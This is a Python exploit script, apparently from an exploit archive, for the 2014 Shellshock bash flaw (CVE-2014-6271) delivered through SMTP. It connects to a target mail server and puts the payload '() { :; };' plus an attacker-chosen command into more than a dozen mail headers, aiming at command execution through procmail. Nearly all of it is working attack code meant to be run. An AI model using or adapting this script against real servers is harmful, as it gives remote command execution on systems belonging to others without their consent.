1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 |
#!/bin/python # Exploit Title:Shellshock SMTP Exploit # Date: 10/3/2014 # Exploit Author: fattymcwopr # Vendor Homepage: gnu.org # Software Link: http://ftp.gnu.org/gnu/bash/ # Version: 4.2.x < 4.2.48 # Tested on: Debian 7 (postfix smtp server w/procmail) # CVE : 2014-6271 from socket import * import sys def usage(): print "shellshock_smtp.py <target> <command>" argc = len(sys.argv) if(argc < 3 or argc > 3): usage() sys.exit(0) rport = 25 rhost = sys.argv[1] cmd = sys.argv[2] headers = ([ "To", "References", "Cc", "Bcc", "From", "Subject", "Date", "Message-ID", "Comments", "Keywords", "Resent-Date", "Resent-From", "Resent-Sender" ]) s = socket(AF_INET, SOCK_STREAM) s.connect((rhost, rport)) # banner grab s.recv(2048*4) def netFormat(d): d += "\n" return d.encode('hex').decode('hex') data = netFormat("mail from:<>") s.send(data) s.recv(2048*4) data = netFormat("rcpt to:<nobody>") s.send(data) s.recv(2048*4) data = netFormat("data") s.send(data) s.recv(2048*4) data = '' for h in headers: data += netFormat(h + ":() { :; };" + cmd) data += netFormat(cmd) # <CR><LF>.<CR><LF> data += "0d0a2e0d0a".decode('hex') s.send(data) s.recv(2048*4) data = netFormat("quit") s.send(data) s.recv(2048*4) |